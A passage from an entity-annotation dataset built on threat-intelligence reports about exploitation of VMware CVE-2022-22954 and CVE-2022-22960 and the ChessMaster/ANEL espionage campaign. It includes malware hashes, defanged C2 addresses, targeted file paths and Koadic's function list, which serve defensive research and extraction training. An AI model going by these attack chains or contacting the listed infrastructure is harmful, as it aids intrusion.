Compromise","entities":[{"id":49545,"label":"vulnerability","start_offset":13,"end_offset":50},{"id":49546,"label":"malware","start_offset":80,"end_offset":85},{"id":49547,"label":"malware","start_offset":86,"end_offset":100},{"id":49548,"label":"vulnerability","start_offset":181,"end_offset":195}],"relations":[{"id":827,"from_id":49546,"to_id":49547,"type":"related-to"},{"id":828,"from_id":49546,"to_id":49545,"type":"exploits"},{"id":829,"from_id":49546,"to_id":49548,"type":"exploits"}],"Comments":[]} {"id":3737,"text":" 2022-04-06:","entities":[{"id":49549,"label":"TIME","start_offset":1,"end_offset":11}],"relations":[],"Comments":[]} {"id":3738,"text":"Publication of VMware advisory VMSA-2022-0011 regarding CVE-2022-22954, CVE-2022-22955,CVE-2022-22956, CVE-2022-22957, CVE-2022-22958, CVE-2022-22959, CVE-2022-22960, CVE-2022-22961.","entities":[{"id":49550,"label":"identity","start_offset":15,"end_offset":21},{"id":49551,"label":"vulnerability","start_offset":56,"end_offset":70},{"id":49552,"label":"vulnerability","start_offset":72,"end_offset":86},{"id":49553,"label":"vulnerability","start_offset":87,"end_offset":101},{"id":49554,"label":"vulnerability","start_offset":103,"end_offset":117},{"id":49555,"label":"vulnerability","start_offset":119,"end_offset":133},{"id":49556,"label":"vulnerability","start_offset":135,"end_offset":149},{"id":49557,"label":"vulnerability","start_offset":151,"end_offset":165},{"id":49558,"label":"vulnerability","start_offset":167,"end_offset":181}],"relations":[],"Comments":[]} {"id":3739,"text":"2022-04","entities":[{"id":49559,"label":"TIME","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":3740,"text":"-11:","entities":[],"relations":[],"Comments":[]} {"id":3741,"text":"Proofs of concept available on GitHub.","entities":[{"id":49560,"label":"SOFTWARE","start_offset":31,"end_offset":37}],"relations":[],"Comments":[]} {"id":3742,"text":"This is also the earliest date at which Unit 42 observed exploitation attempts and scanning activity. 2022-04-13: VMware advisory updated with knowledge of active exploitation of CVE-2022-22954 in the wild.","entities":[{"id":49562,"label":"TIME","start_offset":103,"end_offset":113},{"id":49563,"label":"identity","start_offset":115,"end_offset":121},{"id":49561,"label":"identity","start_offset":40,"end_offset":47},{"id":49564,"label":"vulnerability","start_offset":180,"end_offset":194}],"relations":[],"Comments":[]} {"id":3743,"text":"2022-05-18:","entities":[{"id":49565,"label":"TIME","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":3744,"text":"Publication of VMware advisory VMSA-2022-0014 regarding CVE-2022-22972, CVE-2022-22973.","entities":[{"id":49568,"label":"vulnerability","start_offset":72,"end_offset":86},{"id":49566,"label":"identity","start_offset":15,"end_offset":21},{"id":49567,"label":"vulnerability","start_offset":56,"end_offset":70}],"relations":[],"Comments":[]} {"id":3745,"text":"Publication of CISA Alert.","entities":[{"id":49569,"label":"identity","start_offset":15,"end_offset":19}],"relations":[],"Comments":[]} {"id":3746,"text":" As of this writing, no proofs of concept for exploitation of CVE-22972 or CVE-2022-22973 are known.","entities":[{"id":49571,"label":"vulnerability","start_offset":75,"end_offset":89},{"id":49570,"label":"vulnerability","start_offset":62,"end_offset":71}],"relations":[],"Comments":[]} {"id":3747,"text":"This post will be updated with new findings as they are discovered.","entities":[],"relations":[],"Comments":[]} {"id":3748,"text":" CVE-2022-22954, a remote code execution (RCE) vulnerability due to server-side template injection in VMware Workspace ONE Access and Identity Manager, is trivial to exploit with a single HTTP request to a vulnerable device.","entities":[{"id":49573,"label":"attack-pattern","start_offset":19,"end_offset":46},{"id":49574,"label":"attack-pattern","start_offset":68,"end_offset":98},{"id":49572,"label":"vulnerability","start_offset":1,"end_offset":15},{"id":49575,"label":"SOFTWARE","start_offset":102,"end_offset":150}],"relations":[{"id":830,"from_id":49575,"to_id":49572,"type":"has"},{"id":831,"from_id":49572,"to_id":49573,"type":"uses"},{"id":832,"from_id":49572,"to_id":49574,"type":"uses"}],"Comments":[]} {"id":3749,"text":" The list below details the exploits Unit 42 observed targeting this vulnerability that we deemed worth highlighting.","entities":[{"id":49576,"label":"identity","start_offset":37,"end_offset":44}],"relations":[],"Comments":[]} {"id":3750,"text":"The injected commands worth mentioning that intended to further download payloads to a vulnerable machine can be categorized into the following broad categories: We observed several instances of CVE-2022-22954 being exploited to drop variants of the Mirai malware.","entities":[{"id":49577,"label":"vulnerability","start_offset":196,"end_offset":210},{"id":49578,"label":"malware","start_offset":251,"end_offset":264}],"relations":[{"id":833,"from_id":49578,"to_id":49577,"type":"exploits"}],"Comments":[]} {"id":3751,"text":"In most cases, the exploit was only used to drop the payload, however the payloads themself did not contain CVE-2022-22954 exploits for further propagation.","entities":[{"id":49579,"label":"vulnerability","start_offset":108,"end_offset":122}],"relations":[],"Comments":[]} {"id":3752,"text":"Instead, they were either non-specific Mirai variants or contained previously known exploits such as CVE-2017-17215.","entities":[{"id":49581,"label":"malware","start_offset":39,"end_offset":44},{"id":49580,"label":"vulnerability","start_offset":101,"end_offset":115}],"relations":[{"id":834,"from_id":49581,"to_id":49580,"type":"exploits"}],"Comments":[]} {"id":3753,"text":" The exception to this is Enemybot, a currently prevalent botnet built with bits of code from both Gafgyt and Mirai source code.","entities":[{"id":49584,"label":"malware","start_offset":110,"end_offset":115},{"id":49582,"label":"malware","start_offset":26,"end_offset":34},{"id":49583,"label":"malware","start_offset":99,"end_offset":105}],"relations":[{"id":835,"from_id":49582,"to_id":49583,"type":"variant-of"},{"id":836,"from_id":49582,"to_id":49584,"type":"variant-of"}],"Comments":[]} {"id":3754,"text":"The exploits involving Enemybot eventually download Enemybot samples that themselves embed CVE-2022-22954 exploits for further exploitation and propagation.","entities":[{"id":11380,"label":"malware","start_offset":23,"end_offset":31},{"id":49586,"label":"vulnerability","start_offset":91,"end_offset":105},{"id":49585,"label":"malware","start_offset":52,"end_offset":60}],"relations":[{"id":837,"from_id":49585,"to_id":49586,"type":"exploits"},{"id":838,"from_id":11380,"to_id":49585,"type":"downloads"}],"Comments":[]} {"id":3755,"text":" We observed the vulnerability exploited to download webshells, including: Certain injected commands result in the download of obfuscated Perl scripts.","entities":[{"id":49588,"label":"attack-pattern","start_offset":128,"end_offset":151},{"id":49587,"label":"attack-pattern","start_offset":53,"end_offset":62}],"relations":[],"Comments":[]} {"id":3756,"text":"Deobfuscating these scripts reveals they are versions of the known bot family “Stealth Shellbot” that reaches out to an IRC server to listen for commands to perform.","entities":[{"id":49589,"label":"malware","start_offset":79,"end_offset":95}],"relations":[],"Comments":[]} {"id":3757,"text":"It has the ability to further make HTTP requests based on commands received.","entities":[],"relations":[],"Comments":[]} {"id":3758,"text":"This would mean infected machines could then be directed to further perform scanning and exploitation activity, in addition to directly executing shell commands received from the command and control (C2) server on the target machine.","entities":[],"relations":[],"Comments":[]} {"id":3759,"text":" A complete list of indicators of compromise (IoCs) can be found at the end of this post.","entities":[],"relations":[],"Comments":[]} {"id":3760,"text":" This last command downloads a shell script that ultimately downloads and executes an XMRig coinminer.","entities":[{"id":49590,"label":"malware","start_offset":86,"end_offset":101}],"relations":[],"Comments":[]} {"id":3761,"text":" We also observed some instances of injected payloads that were either trying to read authorized keys on vulnerable machines or were writing into the authorized_keys file to add to the machine’s list of accepted keys.","entities":[],"relations":[],"Comments":[]} {"id":3762,"text":"Following is an example of such an attempt.","entities":[],"relations":[],"Comments":[]} {"id":3763,"text":" CVE-2022-22960 is a privilege escalation vulnerability in VMware Workspace ONE Access, Identity Manager and vRealize Automation instances, due to improper permissions in support scripts.","entities":[{"id":49592,"label":"attack-pattern","start_offset":21,"end_offset":41},{"id":49593,"label":"SOFTWARE","start_offset":59,"end_offset":128},{"id":49591,"label":"vulnerability","start_offset":1,"end_offset":15}],"relations":[{"id":839,"from_id":49591,"to_id":49592,"type":"uses"},{"id":840,"from_id":49593,"to_id":49591,"type":"has"}],"Comments":[]} {"id":3764,"text":"The vulnerability can be leveraged to run commands as a root user on a vulnerable instance.","entities":[],"relations":[],"Comments":[]} {"id":3765,"text":" More specifically, this flaw exists since the default user for these VMware products, horizon, has access to several sudo commands, some of which involve paths that can be overwritten as well.","entities":[{"id":49594,"label":"identity","start_offset":70,"end_offset":76},{"id":49595,"label":"SOFTWARE","start_offset":87,"end_offset":94}],"relations":[],"Comments":[]} {"id":3766,"text":" Attackers can, therefore, leverage CVE-2022-22954 to remotely execute commands to overwrite specific paths.","entities":[{"id":49598,"label":"attack-pattern","start_offset":83,"end_offset":107},{"id":49596,"label":"vulnerability","start_offset":36,"end_offset":50},{"id":49597,"label":"attack-pattern","start_offset":54,"end_offset":79}],"relations":[{"id":842,"from_id":49596,"to_id":49597,"type":"uses"},{"id":843,"from_id":49596,"to_id":49598,"type":"uses"}],"Comments":[]} {"id":3767,"text":"If successful, CVE-2022-22960 can then be leveraged to execute these overwritten paths with root permissions using the sudo command.","entities":[{"id":49599,"label":"vulnerability","start_offset":15,"end_offset":29}],"relations":[],"Comments":[]} {"id":3768,"text":" Our research so far has shown one publicly known sample demonstrating exploitation of CVE-2022-22960 by overwriting the \/usr\/local\/horizon\/scripts\/publishCaCert.hzn file.","entities":[{"id":49600,"label":"vulnerability","start_offset":87,"end_offset":101},{"id":49601,"label":"FILEPATH","start_offset":121,"end_offset":165}],"relations":[{"id":841,"from_id":49601,"to_id":49600,"type":"related-to"}],"Comments":[]} {"id":3769,"text":" The content of this exploit file can be observed below.","entities":[],"relations":[],"Comments":[]} {"id":3770,"text":" Another proof of concept code sample is additionally available targeting the following 2 filepaths: \/opt\/vmware\/certproxy\/bin\/certproxyService.sh \/usr\/local\/horizon\/scripts\/diagnostic\/getPasswordExpiry.hzn ","entities":[{"id":49603,"label":"FILEPATH","start_offset":148,"end_offset":207},{"id":49602,"label":"FILEPATH","start_offset":102,"end_offset":147}],"relations":[],"Comments":[]} {"id":3771,"text":"Palo Alto Networks is still actively investigating a number of the aforementioned vulnerabilities, many of which do not have publicly available exploit code.","entities":[{"id":49604,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} {"id":3772,"text":"Presently, customers may leverage the following to block or detect the threats communicated throughout this publication:","entities":[],"relations":[],"Comments":[]} {"id":3773,"text":"Palo Alto Networks Next Generation Firewall Threat Prevention blocks CVE-2022-22954 exploits with Signature 92483.","entities":[{"id":49605,"label":"SOFTWARE","start_offset":0,"end_offset":61},{"id":49606,"label":"vulnerability","start_offset":69,"end_offset":83}],"relations":[],"Comments":[]} {"id":3774,"text":" Cortex Xpanse was able to identify ~800 instances of VMware Workspace ONE Access connected to the public internet, and can be leveraged to enumerate potentially vulnerable instances within customer networks.","entities":[{"id":49607,"label":"SOFTWARE","start_offset":1,"end_offset":14},{"id":49608,"label":"SOFTWARE","start_offset":54,"end_offset":81}],"relations":[],"Comments":[]} {"id":3775,"text":" WildFire and Cortex XDR categorize all samples of supported file types as malware.","entities":[{"id":49609,"label":"SOFTWARE","start_offset":1,"end_offset":9},{"id":49610,"label":"SOFTWARE","start_offset":14,"end_offset":24}],"relations":[],"Comments":[]} {"id":3776,"text":" Additionally, all encountered URLs have been flagged as malware within PAN-DB, the Advanced URL Filtering URL database.","entities":[],"relations":[],"Comments":[]} {"id":3777,"text":" If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call: As further information or detections are put into place, Palo Alto Networks will update this publication accordingly.","entities":[{"id":49611,"label":"identity","start_offset":92,"end_offset":122},{"id":49612,"label":"identity","start_offset":190,"end_offset":208}],"relations":[],"Comments":[]} {"id":3778,"text":" Palo Alto Networks has shared these findings, including file samples and indicators of compromise, with our fellow Cyber Threat Alliance members.","entities":[{"id":49616,"label":"identity","start_offset":116,"end_offset":145},{"id":49613,"label":"identity","start_offset":1,"end_offset":19}],"relations":[],"Comments":[]} {"id":3779,"text":"CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors.","entities":[{"id":49615,"label":"identity","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":3780,"text":"Learn more about the Cyber Threat Alliance.","entities":[{"id":49617,"label":"identity","start_offset":21,"end_offset":42}],"relations":[],"Comments":[]} {"id":3781,"text":" Mirai\/Gafgyt dropper scripts or variants Perl Shellbot Coinminer activity Webshell downloads (full injected command) Callback\/Scanning activity Direct Download exploits where payloads were no longer live at the time of analysis: Sample hashes 801b23bffa65facee1da69bc6f72f8e1e4e1aeefc63dfd3a99b238d4f9d0a637 6d403c3fc246d6d493a6f4acc18c1c292f710db6ad9c3ea2ff065595c5ad3c5b 940a674cfe8179b2b8964bf408037e0e5a5ab7e47354fe4fa7a9289732e1f1b8 fdc94d0dedf6e53dd435d2b5eacb4c34923fadee50529db6f3de38c71f325e05 85143ecc41fb6aadd822ed2d6f20c721a83ae1088f406f29b8b0b05459053a03 bot.v 0b4b25fab4c922e752e689111f38957e0402fd83f6b1d69e8f43c6f4b68fc1ba C2 server : 5[.]39.217.212:80","entities":[{"id":11449,"label":"malware","start_offset":58,"end_offset":67},{"id":11452,"label":"SHA2","start_offset":251,"end_offset":315},{"id":11453,"label":"SHA2","start_offset":316,"end_offset":380},{"id":11454,"label":"SHA2","start_offset":381,"end_offset":445},{"id":11455,"label":"SHA2","start_offset":446,"end_offset":510},{"id":11456,"label":"SHA2","start_offset":511,"end_offset":575},{"id":11457,"label":"SHA2","start_offset":583,"end_offset":647},{"id":49619,"label":"IPV4","start_offset":660,"end_offset":677},{"id":49620,"label":"malware","start_offset":1,"end_offset":21}],"relations":[{"id":845,"from_id":11453,"to_id":49620,"type":"indicates"},{"id":844,"from_id":11452,"to_id":49620,"type":"indicates"},{"id":846,"from_id":11454,"to_id":49620,"type":"indicates"},{"id":847,"from_id":11455,"to_id":49620,"type":"indicates"},{"id":848,"from_id":11456,"to_id":49620,"type":"indicates"},{"id":849,"from_id":11457,"to_id":49620,"type":"indicates"},{"id":850,"from_id":49620,"to_id":49619,"type":"communicates-with"}],"Comments":[]} {"id":3782,"text":"Channel : #vcenter getsome bot.redis 48628ca95608a015f47506eb1dc6fad0cd04a4cf5d44fdb8f10255fe0aa3c29b C2 server : 64[.]32.6.143:80","entities":[{"id":11458,"label":"SHA2","start_offset":38,"end_offset":102},{"id":49621,"label":"IPV4","start_offset":115,"end_offset":131}],"relations":[],"Comments":[]} {"id":3783,"text":"Channel : #redis getsome botVNC c399b56e1baf063ca2c8aadbbe4a2b58141916aac8ef790a9c29762ed1956bd5 C2 server : 5[.]39.217.212:80","entities":[{"id":11459,"label":"SHA2","start_offset":33,"end_offset":97},{"id":49622,"label":"IPV4","start_offset":110,"end_offset":127}],"relations":[],"Comments":[]} {"id":3784,"text":"Channel : #D getsome 7e29615126585b9f87ded09cfae4724bb5d7896c7daf2adfcef775924549e49b 099ac2f3e10346dbef472b2a7b443ebfe1f6011a9a2518a54c20aad07fe9ec61 Updated May 23, 2022, at 1 p.m. PT. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[{"id":11461,"label":"SHA2","start_offset":88,"end_offset":152},{"id":11460,"label":"SHA2","start_offset":22,"end_offset":86},{"id":49623,"label":"TIME","start_offset":162,"end_offset":189}],"relations":[],"Comments":[]} {"id":3785,"text":"Additional resources https:\/\/www.zerodayinitiative.com\/about https:\/\/www.zerodayinitiative.com\/blog Tags","entities":[{"id":11467,"label":"URL","start_offset":21,"end_offset":60},{"id":49624,"label":"URL","start_offset":61,"end_offset":99}],"relations":[],"Comments":[]} {"id":3786,"text":" Latest News | Exploits & Vulnerabilities | Cyber Threats | Connected Car | APT & Targeted Attacks | Endpoints | IoT | Video","entities":[],"relations":[],"Comments":[]} {"id":3787,"text":"Trend Micro discovered the ChessMaster campaign back in July 2017 as part of our monitoring efforts to protect our customers.","entities":[{"id":49626,"label":"identity","start_offset":0,"end_offset":11},{"id":49627,"label":"campaign","start_offset":27,"end_offset":47},{"id":49625,"label":"TIME","start_offset":56,"end_offset":65}],"relations":[],"Comments":[]} {"id":3788,"text":"At the time, we found ChessMaster targeting different sectors from the academe to media and government agencies in Japan.","entities":[{"id":49628,"label":"campaign","start_offset":22,"end_offset":33},{"id":49629,"label":"identity","start_offset":71,"end_offset":111},{"id":49630,"label":"location","start_offset":115,"end_offset":120}],"relations":[{"id":851,"from_id":49628,"to_id":49629,"type":"targets"},{"id":852,"from_id":49629,"to_id":49630,"type":"located-at"}],"Comments":[]} {"id":3789,"text":"The threat group used a variety of attack tools and techniques to spy on their target organizations.","entities":[],"relations":[],"Comments":[]} {"id":3790,"text":" Back then, we noted that ChessMaster's sophisticated nature implied that the campaign could evolve, before finding changes in the tools and tactics used in the campaign a few months later.","entities":[{"id":49631,"label":"campaign","start_offset":26,"end_offset":37}],"relations":[],"Comments":[]} {"id":3791,"text":" While the original campaign was comprehensive and used remote access Trojans (RATs) such as ChChes and RedLeaves, this new campaign used a new backdoor (Detected by Trend Micro as BKDR_ANEL.ZKEI) that leverages the CVE-2017-8759 vulnerability for its cyberespionage activities.","entities":[{"id":49632,"label":"malware","start_offset":93,"end_offset":99},{"id":49633,"label":"malware","start_offset":104,"end_offset":113},{"id":49634,"label":"malware","start_offset":181,"end_offset":195},{"id":49636,"label":"identity","start_offset":166,"end_offset":177},{"id":49635,"label":"vulnerability","start_offset":216,"end_offset":229}],"relations":[{"id":853,"from_id":49634,"to_id":49635,"type":"exploits"}],"Comments":[]} {"id":3792,"text":"In this blog post, we analyze ChessMaster's current status, including the updated tools in its arsenal — with a particular focus on the evolution of ANEL and how it is used in the campaign.","entities":[{"id":49638,"label":"malware","start_offset":149,"end_offset":153},{"id":49637,"label":"campaign","start_offset":30,"end_offset":41}],"relations":[],"Comments":[]} {"id":3793,"text":" July ChessMaster Campaign November ChessMaster Campaign Current ChessMaster Campaign","entities":[{"id":49639,"label":"campaign","start_offset":8,"end_offset":19},{"id":49642,"label":"campaign","start_offset":38,"end_offset":49},{"id":49643,"label":"campaign","start_offset":67,"end_offset":78},{"id":49640,"label":"TIME","start_offset":3,"end_offset":7},{"id":49641,"label":"TIME","start_offset":29,"end_offset":37}],"relations":[],"Comments":[]} {"id":3794,"text":" Point of Entry Spear-phishing emails containing decoy documents Malicious shortcut (LNK) files and PowerShell Self-extracting archive (SFX) Runtime packers Spear-phishing emails containing decoy documents exploiting CVE-2017-8759 Spear-phishing emails containing decoy documents exploiting CVE-2017-11882, DDEAUTO, Microsoft Office Frameset and Link auto update Notable Tools Hacking Tools Second-stage payloads Koadic Hacking Tools Second-stage payloads Koadic Hacking Tools Second-stage payloads Backdoor ChChes ANEL ANEL Technical Analysis Figure 1.","entities":[{"id":49644,"label":"attack-pattern","start_offset":17,"end_offset":31},{"id":49645,"label":"attack-pattern","start_offset":50,"end_offset":65},{"id":49650,"label":"attack-pattern","start_offset":238,"end_offset":252},{"id":49647,"label":"attack-pattern","start_offset":101,"end_offset":157},{"id":49648,"label":"attack-pattern","start_offset":161,"end_offset":175},{"id":49649,"label":"vulnerability","start_offset":221,"end_offset":234},{"id":49651,"label":"vulnerability","start_offset":299,"end_offset":313},{"id":49652,"label":"attack-pattern","start_offset":271,"end_offset":286},{"id":49654,"label":"malware","start_offset":473,"end_offset":479},{"id":49655,"label":"malware","start_offset":528,"end_offset":534},{"id":49656,"label":"malware","start_offset":538,"end_offset":542},{"id":49657,"label":"malware","start_offset":546,"end_offset":550},{"id":49653,"label":"malware","start_offset":427,"end_offset":433}],"relations":[],"Comments":[]} {"id":3795,"text":"Infection Chain for the current ChessMaster campaign","entities":[{"id":49658,"label":"malware","start_offset":32,"end_offset":43}],"relations":[],"Comments":[]} {"id":3796,"text":"ChessMaster’s current iteration starts off with the familiar phishing attacks seen in the earlier campaigns that involved the use of an email with an attached malicious document using the doc, docx, rtf, csv and msg formats.","entities":[{"id":49659,"label":"malware","start_offset":0,"end_offset":11},{"id":49660,"label":"attack-pattern","start_offset":61,"end_offset":77}],"relations":[],"Comments":[]} {"id":3797,"text":"The email title and attached file name were written in Japanese and contain general business, political, and economy-themed phrases such as 世界経済(World economy) 経済政策(economic policy) 予算概算要求(budget estimation request) 日米対話(Japan-US dialogue) 安倍再任(re-appointment of Prime Minister Abe) 連絡網(contact network) 職員採用案(staff recruitment plan) 会議(meeting) However, there is a change in the exploit document.","entities":[],"relations":[],"Comments":[]} {"id":3798,"text":"When we tracked ChessMaster back in November, we noted that it exploited the SOAP WSDL parser vulnerability CVE-2017-8759 (patched in September 2017) within the Microsoft .NET framework to download additional malware.","entities":[{"id":49661,"label":"malware","start_offset":16,"end_offset":27},{"id":49664,"label":"TIME","start_offset":134,"end_offset":148},{"id":49666,"label":"vulnerability","start_offset":77,"end_offset":121},{"id":49662,"label":"TIME","start_offset":36,"end_offset":44},{"id":49667,"label":"SOFTWARE","start_offset":161,"end_offset":185}],"relations":[{"id":854,"from_id":49661,"to_id":49666,"type":"exploits"},{"id":855,"from_id":49667,"to_id":49666,"type":"has"}],"Comments":[]} {"id":3799,"text":"While ChessMaster still uses the previous exploit, it also added more methods to its arsenal: one exploits another vulnerability, CVE-2017-11882 (patched in November 2017), which was also exploited to deliver illegal versions of the Loki infostealer.","entities":[{"id":49668,"label":"malware","start_offset":233,"end_offset":249},{"id":49669,"label":"TIME","start_offset":157,"end_offset":170},{"id":49670,"label":"vulnerability","start_offset":130,"end_offset":144},{"id":49671,"label":"malware","start_offset":6,"end_offset":17}],"relations":[{"id":856,"from_id":49671,"to_id":49670,"type":"exploits"},{"id":857,"from_id":49670,"to_id":49668,"type":"drops"}],"Comments":[]} {"id":3800,"text":"Figure 2. Exploitation of CVE-2017-11882","entities":[{"id":49672,"label":"vulnerability","start_offset":26,"end_offset":40}],"relations":[],"Comments":[]} {"id":3801,"text":"It also abuses three legitimate MS Office functions:","entities":[{"id":49673,"label":"SOFTWARE","start_offset":32,"end_offset":41}],"relations":[],"Comments":[]} {"id":3802,"text":"Function Purpose Affected MS Office Formats we found in the wild Automatic Dynamic Data Exchange (DDEAUTO) A legitimate Microsoft Office function used in an Office file to retrieve data from another Office file","entities":[{"id":49675,"label":"SOFTWARE","start_offset":120,"end_offset":136},{"id":49674,"label":"SOFTWARE","start_offset":26,"end_offset":35},{"id":49677,"label":"SOFTWARE","start_offset":199,"end_offset":205},{"id":49676,"label":"SOFTWARE","start_offset":157,"end_offset":163}],"relations":[],"Comments":[]} {"id":3803,"text":".doc .rtf .msg Link","entities":[],"relations":[],"Comments":[]} {"id":3804,"text":"Auto Update","entities":[],"relations":[],"Comments":[]} {"id":3805,"text":"An Office function used for automatic and user-free updates for embedded links upon opening.","entities":[{"id":49678,"label":"SOFTWARE","start_offset":3,"end_offset":9}],"relations":[],"Comments":[]} {"id":3806,"text":" .csv Microsoft Word's \"Frames\/Frameset\" A feature that allows HTML or Text pages to be loaded in a frame within Microsoft Word.","entities":[{"id":49679,"label":"SOFTWARE","start_offset":8,"end_offset":22},{"id":49680,"label":"SOFTWARE","start_offset":115,"end_offset":129}],"relations":[],"Comments":[]} {"id":3807,"text":" .docx Figure 3. Exploitation of DDEAUTO Figure 4.","entities":[],"relations":[],"Comments":[]} {"id":3808,"text":"Abusing Microsoft Word's \"Frames\/Frameset\"","entities":[{"id":49681,"label":"SOFTWARE","start_offset":8,"end_offset":22}],"relations":[],"Comments":[]} {"id":3809,"text":" Figure 5. Exploitation of Link Auto Update","entities":[],"relations":[],"Comments":[]} {"id":3810,"text":"ChessMaster can utilize any of these methods to download the next malware in the chain, the open source post-exploitation tool known as “Koadic,” which the previous campaign also used.","entities":[{"id":49682,"label":"malware","start_offset":0,"end_offset":11},{"id":49683,"label":"malware","start_offset":137,"end_offset":143}],"relations":[{"id":858,"from_id":49682,"to_id":49683,"type":"downloads"}],"Comments":[]} {"id":3811,"text":"This tool is responsible for stealing information — specifically the environment information — within the target system.","entities":[],"relations":[],"Comments":[]} {"id":3812,"text":"Koadic executes the following command: %comspec% \/q \/c 1> 2>&1 ","entities":[{"id":49684,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":3813,"text":"The commands and output of Koadic will change according to the ANEL version used in the attack.","entities":[{"id":49686,"label":"malware","start_offset":27,"end_offset":33},{"id":49685,"label":"malware","start_offset":63,"end_offset":67}],"relations":[],"Comments":[]} {"id":3814,"text":"The table below lists examples of the commands and outputs for ANEL versions 5.1.1 rc and 5.1.2 rc1.","entities":[{"id":49687,"label":"malware","start_offset":63,"end_offset":67}],"relations":[],"Comments":[]} {"id":3815,"text":"Note that if ANEL 5.1.2 rc1 was downloaded, the attacker would use HTTPS to avoid the downloaded data being captured as clear text.","entities":[{"id":11587,"label":"malware","start_offset":13,"end_offset":17}],"relations":[],"Comments":[]} {"id":3816,"text":"Figure 6.","entities":[],"relations":[],"Comments":[]} {"id":3817,"text":"Koadic commands and output when ANEL 5.1.1 rc is used Figure 7.","entities":[{"id":11590,"label":"malware","start_offset":0,"end_offset":6},{"id":11592,"label":"malware","start_offset":32,"end_offset":36}],"relations":[],"Comments":[]} {"id":3818,"text":"Koadic commands and output when ANEL 5.1.2 rc1 is used","entities":[{"id":11594,"label":"malware","start_offset":0,"end_offset":6},{"id":11596,"label":"malware","start_offset":32,"end_offset":36}],"relations":[],"Comments":[]} {"id":3819,"text":"The table below lists all of Koadic's functions: {Variable}.user User-related functions {Variable}.user.isElevated Check Privilege {Variable}.user.OS Get OS Version {Variable}.user.DC","entities":[{"id":11597,"label":"malware","start_offset":29,"end_offset":35}],"relations":[],"Comments":[]} {"id":3820,"text":"Get DCName from Registry {Variable}.user.Arch","entities":[],"relations":[],"Comments":[]} {"id":3821,"text":"Get Architecture {Variable}.user.info Get User Information {Variable}.work","entities":[],"relations":[],"Comments":[]} {"id":3822,"text":"Main Routine functions {Variable}.work.report Reports to server {Variable}.work.error Returns error {Variable}.work.make_url Alters\/Modifies URL (C&C) {Variable}.work.get","entities":[],"relations":[],"Comments":[]} {"id":3823,"text":"Get the return of POST Header {Variable}.work.fork Creates rundll32.exe process {Variable}.http HTTP Connection functions {Variable}.http.create Creates initial HTTP objects {Variable}.http.post POST header {Variable}.http.addHeaders","entities":[],"relations":[],"Comments":[]} {"id":3824,"text":"Adds HTTP Headers {Variable}.http.get GET Header {Variable}.http.upload Uploads binaries\/data {Variable}.http.bin2str String manipulation {Variable}.http.downloadEx","entities":[],"relations":[],"Comments":[]} {"id":3825,"text":"Downloads response {Variable}.http.download Additional download function {Variable}.process Process-related functions {Variable}.process.currentPID Get Current Process ID {Variable}.process.list Enumerates Process {Variable}.process.kill Terminates Process {Variable}.registry Registry-related functions {Variable}.registry.HKCR Set HKEY_CLASSES_ROOT {","entities":[],"relations":[],"Comments":[]} {"id":3826,"text":"Variable}.registry.HKCU Set HKEY_CURRENT_USER {Variable}.registry.HKLM Set HKEY_LOCAL_MACHINE {Variable}.registry.STRING Set String Value {Variable}.registry.BINARY Set Binary Value {Variable}.registry.DWORD Set DWORD Value {Variable}.registry.QWORD","entities":[],"relations":[],"Comments":[]} {"id":3827,"text":"Set QWORD Value {Variable}.registry.write Write\/Add Registry {Variable}.registry.provider Create Registry Handle {Variable}.registry.destroy Deletes Registry Key {Variable}.registry.read Get\/Read Registry Entries {Variable}.WMI WMI-related functions {","entities":[],"relations":[],"Comments":[]} {"id":3828,"text":"Variable}.WMI.createProcess Creates specified process {Variable}.shell File\/Process Execution functions {Variable}.shell.run Run commands {Variable}.shell.exec Executes process {Variable}.file File-related functions {Variable}.file.getPath Get specified file path {Variable}.file.readText Reads specified text file {Variable}.file.get32BitFolder Get System Folder (32\/64-bit) {Variable}.file.writol Writes on specified file {Variable}.file.deleteFile Deletes specified file {Variable}.file.readBinary Reads specified binary file. Figure 8.","entities":[],"relations":[],"Comments":[]} {"id":3829,"text":"Command added when the Koadic RAT is downloaded (use of {Variable}.shell.exec command)","entities":[{"id":11613,"label":"malware","start_offset":23,"end_offset":29}],"relations":[],"Comments":[]} {"id":3830,"text":"If Koadic finds that the system is conducive to the attacker’s interests, it downloads a base64-encrypted version of the ANEL malware from the Command-and-Control (C&C) server and executes it. Encrypted ANEL is decrypted using the “certutil -docode” command.","entities":[{"id":11615,"label":"malware","start_offset":121,"end_offset":125},{"id":11618,"label":"malware","start_offset":204,"end_offset":208},{"id":49688,"label":"malware","start_offset":3,"end_offset":9}],"relations":[{"id":859,"from_id":49688,"to_id":11615,"type":"downloads"}],"Comments":[]} {"id":3831,"text":"When ANEL executes, a decrypted DLL file with the filename “lena_http_dll.dll” is expanded in memory.","entities":[{"id":11620,"label":"malware","start_offset":5,"end_offset":9},{"id":11621,"label":"FILEPATH","start_offset":60,"end_offset":77}],"relations":[],"Comments":[]} {"id":3832,"text":"This file contains one export function — either “crt_main” or “lena_main” Figure 9.","entities":[],"relations":[],"Comments":[]} {"id":3833,"text":"Base64 encoded ANEL downloaded by Koadic ANEL will send the infected environment’s information to the C&C server.","entities":[{"id":49689,"label":"malware","start_offset":15,"end_offset":19},{"id":49690,"label":"malware","start_offset":34,"end_offset":40},{"id":49691,"label":"malware","start_offset":41,"end_offset":45},{"id":49692,"label":"Infrastucture","start_offset":102,"end_offset":112}],"relations":[{"id":860,"from_id":49690,"to_id":49689,"type":"downloads"},{"id":861,"from_id":49691,"to_id":49692,"type":"exfiltrates-to"}],"Comments":[]} {"id":3834,"text":"When sending the information, ANEL encrypts the data using blowfish, XOR, and Base64-based encryption methods.","entities":[{"id":11628,"label":"malware","start_offset":30,"end_offset":34}],"relations":[],"Comments":[]} {"id":3835,"text":"The format ANEL uses to send data is similar to ChChes, but ANEL's encryption method is easier to use.","entities":[{"id":11630,"label":"malware","start_offset":11,"end_offset":15},{"id":11631,"label":"malware","start_offset":48,"end_offset":54},{"id":11632,"label":"malware","start_offset":60,"end_offset":64}],"relations":[],"Comments":[]} 